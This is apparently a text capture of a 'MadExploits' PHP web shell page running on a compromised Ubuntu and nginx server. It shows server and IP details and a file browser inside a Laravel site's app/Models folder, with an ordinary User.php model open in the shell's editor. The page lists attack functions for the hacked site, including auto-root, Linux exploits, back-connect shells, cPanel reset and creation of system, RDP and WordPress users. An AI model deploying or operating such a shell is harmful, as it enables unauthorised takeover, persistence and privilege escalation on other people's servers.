Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
beta.nepalphd /
app /
Models /
[ HOME SHELL ]
Name
Size
Permission
Action
Aboutus.php
292
B
-rw-r--r--
Album.php
603
B
-rw-r--r--
AlbumImage.php
655
B
-rw-r--r--
Carousell.php
267
B
-rw-r--r--
Commitee.php
1.31
KB
-rw-rw-r--
CommitteeType.php
571
B
-rw-rw-r--
ContactPerson.php
333
B
-rw-r--r--
Download.php
209
B
-rw-r--r--
ExecutiveCommitteeTerm.php
600
B
-rw-rw-r--
MasterCommittee.php
566
B
-rw-r--r--
Member.php
894
B
-rw-r--r--
MemberType.php
376
B
-rw-r--r--
News.php
282
B
-rw-r--r--
Notice.php
285
B
-rw-r--r--
Publication.php
394
B
-rw-r--r--
Setup.php
303
B
-rw-r--r--
User.php
913
B
-rw-r--r--
Video.php
302
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : User.php
<?php namespace App\Models; use Illuminate\Contracts\Auth\MustVerifyEmail; use Illuminate\Database\Eloquent\Factories\HasFactory; use Illuminate\Foundation\Auth\User as Authenticatable; use Illuminate\Notifications\Notifiable; use Laravel\Sanctum\HasApiTokens; class User extends Authenticatable { use HasApiTokens, HasFactory, Notifiable; /** * The attributes that are mass assignable. * * @var array<int, string> */ protected $fillable = [ 'name', 'email', 'password', ]; /** * The attributes that should be hidden for serialization. * * @var array<int, string> */ protected $hidden = [ 'password', 'remember_token', ]; /** * The attributes that should be cast. * * @var array<string, string> */ protected $casts = [ 'email_verified_at' => 'datetime', ]; }
Close